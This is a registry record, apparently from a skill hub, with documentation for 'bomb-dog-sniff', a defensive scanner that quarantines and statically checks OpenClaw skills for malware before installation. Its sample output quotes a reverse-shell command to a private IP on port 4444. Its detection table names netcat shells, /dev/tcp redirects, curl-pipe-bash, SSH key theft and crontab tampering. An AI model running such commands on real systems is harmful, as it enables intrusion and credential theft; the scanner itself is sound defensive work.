{"skill":{"slug":"skill-bomb-dog-sniff","displayName":"Bomb Dog Sniff","summary":"Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills.\nSniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation.\nQuarantine → Scan → Install only the safe ones.","description":"---\nname: bomb-dog-sniff\nversion: 1.2.0\ndescription: |\n  Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills.\n  Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation.\n  Quarantine → Scan → Install only the safe ones.\nauthor: OpenClaw Security Team\nhomepage: https://github.com/openclaw/skills/bomb-dog-sniff\n---\n\n# bomb-dog-sniff v1.2.0 🐕\n\n**Like a bomb-sniffing dog for OpenClaw skills**\n\nSniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.\n\n## What's New in v1.2.0\n\n### Security Hardening\n- **Fixed command injection vulnerabilities** in download functions\n- **Added path traversal protection** - Sanitizes all path inputs\n- **Secure quarantine** - Randomized directory names with restricted permissions\n- **Binary file detection** - Skips binary files to avoid false positives\n- **File size limits** - Prevents DoS via huge files\n- **ReDoS protection** - Limits regex processing on long lines\n\n### Detection Improvements\n- **Smart false positive reduction** - Better context-aware pattern matching\n- **Entropy analysis** - Detects encoded/encrypted payloads\n- **Test file awareness** - Reduces severity for findings in test files\n- **Confidence scoring** - Each finding has confidence level (high/medium/low)\n- **13 detection categories** - Added supply chain, prototype pollution, and malicious script detection\n\n### New Patterns\n- Supply chain attack indicators (typosquatting, dynamic requires)\n- Prototype pollution vulnerabilities\n- Malicious npm/yarn scripts\n- Browser credential theft\n- SSH key theft\n- Systemd persistence mechanisms\n\n## Quick Start\n\n```bash\n# Sniff out threats before installing\nopenclaw skill bomb-dog-sniff scan ./downloaded-skill\n\n# Safe install from clawhub (auto-downloads, sniffs, installs if clean)\nopenclaw skill bomb-dog-sniff safe-install cool-skill\n\n# Audit an already-installed skill\nopenclaw skill bomb-dog-sniff audit bird\n\n# Batch scan multiple skills\nopenclaw skill bomb-dog-sniff batch skills-to-audit.txt\n```\n\n## Commands\n\n### scan\n\nScan a skill directory for malicious patterns.\n\n```bash\nopenclaw skill bomb-dog-sniff scan <path> [options]\n\nOptions:\n  -j, --json          Output JSON only\n  -v, --verbose       Show detailed findings\n  -t, --threshold N   Set risk threshold (default: 40)\n  -h, --help          Show help\n```\n\n**Example:**\n```bash\nopenclaw skill bomb-dog-sniff scan ./untrusted-skill\nopenclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json\n```\n\n**Output:**\n```\n🔍 Bomb-Dog-Sniff Security Scanner v1.2.0\nTarget: /home/user/skills/untrusted-skill\n\n🔴 CRITICAL (2)\n──────────────────────────────────────────────────\n  crypto_harvester: scripts/wallet.js:23\n    Crypto wallet private key harvesting detected\n    Code: const privateKey = \"a1b2c3...\"\n    Confidence: high\n\n  reverse_shell: scripts/backdoor.sh:5\n    Reverse shell or remote code execution detected\n    Code: bash -i >& /dev/tcp/192.168.1.100/4444\n    Confidence: high\n\n🟠 HIGH (1)\n──────────────────────────────────────────────────\n  pipe_bash: install.sh:12\n    Dangerous curl | bash pattern detected\n    Confidence: high\n\n═══════════════════════════════════════════════════\nSCAN SUMMARY\n═══════════════════════════════════════════════════\n☠️ Risk Score: 75/100\n   Risk Level: MALICIOUS\n   Duration: 125ms\n   Files Scanned: 12/15\n   Files Skipped: 3 (binary/empty/large)\n   Findings: 3\n\n   Severity Breakdown:\n     🔴 CRITICAL: 2\n     🟠 HIGH: 1\n\n📋 Recommendation:\n   MALICIOUS - Do not install. Found 3 critical security issues.\n\nScan ID: bds-20260208-a1b2c3d4\n```\n\n### safe-install\n\nDownload from clawhub/GitHub, scan, and install only if safe.\n\n```bash\nopenclaw skill bomb-dog-sniff safe-install <source> [options]\n\nSource:\n  - ClawHub skill name: bird\n  - GitHub URL: https://github.com/user/skill\n  - Local path: ./local-skill\n\nOptions:\n  --threshold N   Set risk threshold (default: 39)\n  --dry-run       Scan only, don't install\n  --verbose       Show all findings\n```\n\n**Example:**\n```bash\n# Install with default threshold (39)\nopenclaw skill bomb-dog-sniff safe-install bird\n\n# Stricter threshold\nopenclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20\n\n# Scan only (dry run)\nopenclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run\n\n# GitHub source\nopenclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill\n```\n\n### audit\n\nAudit an already-installed skill.\n\n```bash\nopenclaw skill bomb-dog-sniff audit <skill-name> [options]\n```\n\n**Example:**\n```bash\nopenclaw skill bomb-dog-sniff audit notion\n```\n\n### batch\n\nScan multiple skills from a list file.\n\n```bash\nopenclaw skill bomb-dog-sniff batch <list-file>\n```\n\n**Example list file (skills.txt):**\n```\n# My installed skills to audit\nbird\nnotion\ngog\nslack\n./custom-skill\n\n# Commented lines are ignored\n# old-skill\n```\n\n**Run:**\n```bash\nopenclaw skill bomb-dog-sniff batch skills.txt\n```\n\n## Detection Categories\n\nbomb-dog-sniff scans for these threat categories:\n\n| Category | Severity | Examples Detected |\n|----------|----------|-------------------|\n| **crypto_harvester** | CRITICAL | Private key extraction, wallet exports, mnemonic theft |\n| **credential_theft** | CRITICAL | Environment variable exfiltration, config file theft, SSH key theft |\n| **reverse_shell** | CRITICAL | Netcat shells, `/dev/tcp/` redirects, socket-based shells, eval of remote code |\n| **keylogger** | CRITICAL | Keyboard capture with exfiltration, clipboard theft, password field monitoring |\n| **encoded_payload** | HIGH | Base64 execution chains, hex escapes with eval context, obfuscated code |\n| **suspicious_api** | HIGH | Pastebin/ngrok/webhook destinations, dynamic URL construction with secrets |\n| **pipe_bash** | HIGH | `curl \\| bash`, `wget \\| sh` patterns |\n| **deposit_scam** | HIGH | \"Send ETH to 0x...\", payment prompts in unexpected contexts |\n| **supply_chain** | HIGH | Typosquatting, dynamic requires, suspicious postinstall scripts |\n| **prototype_pollution** | HIGH | Dangerous object merging, `__proto__` manipulation |\n| **malicious_script** | CRITICAL | Pre/postinstall doing network/exec operations, modifying other packages |\n| **network_exfil** | MEDIUM | File reading followed by network transmission |\n| **file_tamper** | CRITICAL | `.bashrc` modification, crontab editing, SSH authorized_keys manipulation |\n\n## Risk Scoring\n\n```\n0-19   SAFE        ✅ Install freely\n20-39  LOW         ⚠️  Review recommended\n40-69  SUSPICIOUS  🚫 Blocked by default\n70-100 MALICIOUS   ☠️  Never install\n```\n\nEach finding adds to the score:\n- CRITICAL: +25 points (× confidence multiplier)\n- HIGH: +15 points (× confidence multiplier)\n- MEDIUM: +5 points (× confidence multiplier)\n\nConfidence multipliers:\n- High confidence: 1.0×\n- Medium confidence: 0.75×\n- Low confidence: 0.5×\n\nScore caps at 100.\n\n## How It Works\n\n### Safe Install Process\n\n```\n1. QUARANTINE\n   └── Skill downloaded to /tmp/bds-q-<random>/\n   └── Randomized, non-predictable directory name\n   └── Restricted permissions (0o700)\n   \n2. SCAN\n   ├── Check all files against detection patterns\n   ├── Skip binary files, empty files, files >10MB\n   ├── Calculate entropy for encoded payload detection\n   ├── Apply confidence multipliers\n   └── Generate findings report\n   \n3. DECISION\n   ├── Risk > threshold? → BLOCK & DELETE\n   └── Risk ≤ threshold? → PROCEED\n   \n4. INSTALL (if passed)\n   └── Move from quarantine to skills directory\n   └── Backup existing installation (max 5 backups)\n   \n5. CLEANUP\n   └── Securely remove quarantine directory\n```\n\n### Scanning Details\n\n- **Static analysis only** - No code execution\n- **Multi-pattern matching** - 60+ detection patterns\n- **Line-level reporting** - Exact file:line for each finding\n- **False positive reduction** - Context-aware pattern matching\n- **Binary detection** - Automatically skips binary files\n- **Symlink loop protection** - Tracks visited inodes\n- **Depth limiting** - Max 20 directory levels\n- **Test file handling** - Reduces severity for test files\n\n## Configuration\n\n### Environment Variables\n\n```bash\n# Set custom skills directory\nexport OPENCLAW_SKILLS_DIR=/path/to/skills\n\n# Set default risk threshold\nexport BOMB_DOG_THRESHOLD=25\n```\n\n### Per-Skill Configuration\n\nAdd to your skill's `package.json`:\n\n```json\n{\n  \"bomb-dog-sniff\": {\n    \"riskThreshold\": 25,\n    \"excludedCategories\": [\"network_exfil\"]\n  }\n}\n```\n\n## CI/CD Integration\n\nAdd to your CI pipeline:\n\n```yaml\n# .github/workflows/skill-security.yml\nname: Skill Security Scan\n\non: [push, pull_request]\n\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v3\n      \n      - name: Scan skills\n        run: |\n          for skill in skills/*/; do\n            echo \"Scanning $skill\"\n            node skills/bomb-dog-sniff/scan.js \"$skill\" || exit 1\n          done\n```\n\nExit codes:\n- `0` - Safe (score below threshold)\n- `1` - Error/invalid arguments\n- `2` - Risky (score ≥ threshold)\n\n## Programmatic API\n\n```javascript\nconst { scanSkill } = require('./scan');\nconst { safeDownload } = require('./safe-download');\n\n// Scan a skill\nconst report = scanSkill('./path/to/skill', { verbose: true });\nconsole.log(`Risk score: ${report.riskScore}`);\nconsole.log(`Findings: ${report.findings.length}`);\n\n// Safe download and install\nconst result = await safeDownload('cool-skill', {\n  autoInstall: true,\n  riskThreshold: 30,\n});\n\nif (!result.success) {\n  console.error('Installation blocked:', result.reason);\n}\n```\n\n## Security Limits\n\nTo prevent DoS and ensure scanner security:\n\n| Limit | Value | Purpose |\n|-------|-------|---------|\n| Max file size | 10MB | Prevent memory exhaustion |\n| Max line length | 10KB | Prevent ReDoS attacks |\n| Max files per scan | 10,000 | Prevent resource exhaustion |\n| Max findings per file | 100 | Prevent output flooding |\n| Max total findings | 500 | Prevent result flooding |\n| Max directory depth | 20 | Prevent infinite recursion |\n| Download timeout | 2 minutes | Prevent hanging downloads |\n| Max download size | 50MB | Prevent disk exhaustion |\n\n## False Positives\n\nIf legitimate code triggers a warning:\n\n1. **Check confidence level** - Low confidence findings are more likely to be false positives\n2. **Review the excerpt** - Look at the actual code flagged\n3. **Test files are noted** - Findings in `*.test.js` or `__tests__/` have reduced severity\n4. **Comments are generally skipped** - Unless they contain suspicious keywords\n\nTo report false positives, please include:\n- The file content that triggered the false positive\n- The pattern category that matched\n- Expected behavior\n\n## Best Practices\n\n1. **Always scan before installing** unknown skills\n2. **Use `--dry-run`** first for untrusted sources\n3. **Set lower threshold** (`--threshold 20`) for critical systems\n4. **Audit regularly** - Rescan installed skills periodically\n5. **Review CRITICAL findings** - Never ignore critical severity warnings\n6. **Check confidence levels** - High confidence = higher priority\n\n## Files\n\n- `SKILL.md` - This documentation\n- `scan.js` - Core scanner engine\n- `patterns.js` - Detection pattern definitions\n- `safe-download.js` - Safe download & install logic\n- `scripts/sniff.sh` - CLI wrapper\n- `package.json` - Package configuration\n- `QUICKSTART.md` - Quick reference guide\n\n## Security Notes\n\n⚠️ **Limitations:**\n- Static analysis only (some obfuscation may evade detection)\n- Pattern-based (novel attacks may not be detected)\n- Not a replacement for manual code review on critical systems\n- Cannot detect runtime-only malicious behavior\n\n✅ **Recommendations:**\n- Use bomb-dog-sniff as first line of defense\n- Review code manually for high-security environments\n- Keep patterns.js updated with new threat signatures\n- Report false positives and missed detections\n- Combine with other security tools for defense in depth\n\n## Changelog\n\n### v1.2.0 (Hardened Edition)\n- **SECURITY**: Fixed command injection vulnerabilities in safe-download.js\n- **SECURITY**: Added path traversal protection\n- **SECURITY**: Secure randomized quarantine directories\n- **FEATURE**: Binary file detection and skipping\n- **FEATURE**: File size limits (10MB per file, 50MB download)\n- **FEATURE**: Entropy analysis for encoded payload detection\n- **FEATURE**: Confidence scoring for all findings\n- **FEATURE**: Test file awareness with severity reduction\n- **FEATURE**: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)\n- **IMPROVEMENT**: Better false positive reduction with context-aware matching\n- **IMPROVEMENT**: ReDoS protection via line length limits\n- **IMPROVEMENT**: Symlink loop protection\n- **IMPROVEMENT**: Backup rotation (max 5 backups)\n\n### v1.1.0\n- Added `safe-install` command with quarantine workflow\n- Added `audit` command for installed skills\n- Added `batch` command for multiple skill scanning\n- Enhanced detection patterns (50+ signatures)\n- Added risk threshold configuration\n\n### v1.0.0\n- Initial release with basic scanning\n- 10 detection categories\n- JSON output format\n\n## License\n\nMIT - See LICENSE file\n\n---\n\n**Stay safe. Scan everything. Trust verified skills only.** 🦞🐕\n","tags":{"latest":"0.1.0"},"stats":{"comments":0,"downloads":1840,"installsAllTime":1,"installsCurrent":1,"stars":2,"versions":1},"createdAt":1770530107924,"updatedAt":1779076802779},"latestVersion":{"version":"0.1.0","createdAt":1770530107924,"changelog":"bomb-dog-sniff v1.2.0 is a major security and detection upgrade for OpenClaw skill scanning.\n\n- Fixed command injection and added path traversal protection for safer downloads and scanning.\n- Quarantines skills in randomized, permission-locked directories before scanning.\n- Now detects and skips binary/oversized files and restricts regex processing to prevent resource attacks.\n- Smarter detection: reduced false positives, added entropy analysis for encoded threats, awareness of test files, and per-finding confidence scoring.\n- Expanded to 13 detection categories, now including supply chain attacks, prototype pollution, and new script-based threats.\n- New detection patterns target credential and SSH key theft, browser and system persistence, and more.\n- All commands (scan, safe-install, audit, batch) documented with clear examples and risk scoring explanations.","license":null},"metadata":null,"owner":{"handle":"lvcidpsyche","userId":"s17drrndmbstv09yka41s67hwh884zsh","displayName":"LvcidPsyche","image":"https://avatars.githubusercontent.com/u/160208855?v=4"},"moderation":{"isSuspicious":false,"isMalwareBlocked":false,"verdict":"clean","reasonCodes":["review.llm_review"],"summary":"Review: review.llm_review","engineVersion":"v2.4.24","updatedAt":1779959645842}}